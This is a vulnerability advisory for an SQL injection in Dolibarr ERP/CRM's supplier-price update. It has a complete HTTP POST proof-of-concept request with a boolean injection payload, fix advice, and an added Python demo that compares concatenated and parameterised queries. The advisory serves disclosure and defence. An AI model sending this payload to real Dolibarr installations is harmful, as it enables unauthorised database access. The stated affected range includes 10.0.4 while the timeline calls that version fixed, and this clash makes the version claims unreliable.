usd-2019-0067 | Dolibarr ERP/CRM ver. 3.0 – 10.0.4


Advisory ID: usd-2019-0067
CVE Number: Pending
Affected Product: Dolibarr ERP/CRM
Affected Version: 3.0 – 10.0.4
Vulnerability Type: SQL injection
Security Risk: High
Vendor URL: https://www.dolibarr.org/
Vendor Status: Fixed (not verified)

Description

It is possible to execute arbitrary SQL commands by manipulating the ref_fourn_price_id parameter while editing the supplier price of a product. The parameter is processed by /dolibarr/htdocs/product/fournisseurs.php (action=updateprice) and reaches the database query without proper validation.

Proof of Concept (PoC)

The following request injects a boolean condition (-2209 OR 9486=9486) through ref_fourn_price_id. The same injection point can be used to extract data, for example the current database user:

POST /dolibarr/htdocs/product/fournisseurs.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-DE
Accept-Encoding: gzip, deflate
Referer: http://localhost/dolibarr/htdocs/product/fournisseurs.php?id=1&action=add_price
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Cookie: DOLSESSID_d62fd6e735d72194222ef3c6d1021d7a=hltic273b6m378p7a1qrqf1b2d
Connection: close
Upgrade-Insecure-Requests: 1

token=$2y$10$TZJzw/3dPdYxPhcc.H1gF.JSduPMJyndwzgx1Bc7Wsd7XSGmOvgMe&action=updateprice&id_fourn=1&ref_fourn=1234&qty=1&tva_tx=0&price=123&price_base_type=HT&remise_percent=&delivery_time_days=&supplier_reputation=-1&ref_fourn_price_id=-2209 OR 9486=9486

Fix

It is recommended to use prepared statements. Building SQL queries by hand through string concatenation is always more error-prone, and such errors lead to vulnerabilities. A blacklist that tries to filter user input is not recommended either, because it is complex and easy to bypass. Note that the PoC payload contains no quote characters, so quote-escaping alone would not stop it; in addition to parameter binding, an identifier such as ref_fourn_price_id should be validated as an integer before it is used at all.
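The following is an added example, not Dolibarr's code and not the vendor's fix: it reproduces the injection pattern behind this advisory with the PoC payload and shows the parameterised alternative. SQLite stands in for the MySQL/MariaDB backend, and the table name, columns and rows are constructed for the demo (they are assumptions, not Dolibarr's real schema).

```python
"""Injection pattern behind usd-2019-0067 beside the parameterised fix.
Added example; not Dolibarr code. SQLite replaces MySQL/MariaDB, and the
table layout below is constructed for the demo (assumed, not real schema)."""
import sqlite3

# Value of ref_fourn_price_id taken from the advisory's PoC request.
PAYLOAD = "-2209 OR 9486=9486"


def setup_db():
    """Constructed sample data: three supplier price rows (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE product_fournisseur_price "
        "(rowid INTEGER PRIMARY KEY, fk_product INTEGER, ref_fourn TEXT, price REAL)"
    )
    conn.executemany(
        "INSERT INTO product_fournisseur_price VALUES (?, ?, ?, ?)",
        [(1, 1, "SUP-A", 10.0), (2, 1, "SUP-B", 20.0), (3, 2, "SUP-C", 30.0)],
    )
    return conn


def rows_vulnerable(conn, ref_fourn_price_id):
    """Vulnerable pattern: the request parameter is spliced into the SQL text.
    With the PoC payload the WHERE clause becomes a tautology and every row
    matches; any other SQL could be appended the same way."""
    sql = ("SELECT rowid, ref_fourn, price FROM product_fournisseur_price "
           "WHERE rowid = " + str(ref_fourn_price_id))
    return conn.execute(sql).fetchall()


def escape_quotes(value):
    """Quote escaping of the kind a blacklist/escape filter applies.
    The PoC payload contains no quotes, so it passes through unchanged."""
    return value.replace("'", "\\'").replace('"', '\\"')


def rows_parameterised(conn, ref_fourn_price_id):
    """Hardened: the value is bound as a parameter and never parsed as SQL.
    The payload is compared as an opaque string and matches nothing."""
    sql = ("SELECT rowid, ref_fourn, price FROM product_fournisseur_price "
           "WHERE rowid = ?")
    return conn.execute(sql, (ref_fourn_price_id,)).fetchall()


def is_valid_id(value):
    """Input validation to apply before any query: an id must be a plain
    base-10 integer. Returns False for the PoC payload."""
    try:
        int(value, 10)
    except (TypeError, ValueError):
        return False
    return True


def demo():
    """Row counts for each variant, so the effect of the payload is visible."""
    conn = setup_db()
    return {
        "legit_vulnerable": len(rows_vulnerable(conn, "1")),
        "payload_vulnerable": len(rows_vulnerable(conn, PAYLOAD)),
        "escaped_payload_vulnerable": len(rows_vulnerable(conn, escape_quotes(PAYLOAD))),
        "payload_parameterised": len(rows_parameterised(conn, PAYLOAD)),
        "legit_parameterised": len(rows_parameterised(conn, 1)),
    }


if __name__ == "__main__":
    for name, count in demo().items():
        print(f"{name}: {count} row(s)")
    print("payload passes integer validation:", is_valid_id(PAYLOAD))
```

Running the script shows one row for a legitimate id, three rows (the whole table) for the payload through string concatenation, still three rows after quote escaping, and zero rows once the value is bound as a parameter; the integer check rejects the payload before a query is built at all.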

Timeline

  • 2019-11-06 Vulnerability discovered by Daniel Hoffmann
  • 2019-11-13 First contact with vendor
  • 2019-11-27 Vendor released version 10.0.4 which fixes the vulnerability (not verified)
  • 2020-02-05 Security advisory released

Credits

This security vulnerability was discovered by Daniel Hoffmann of usd AG.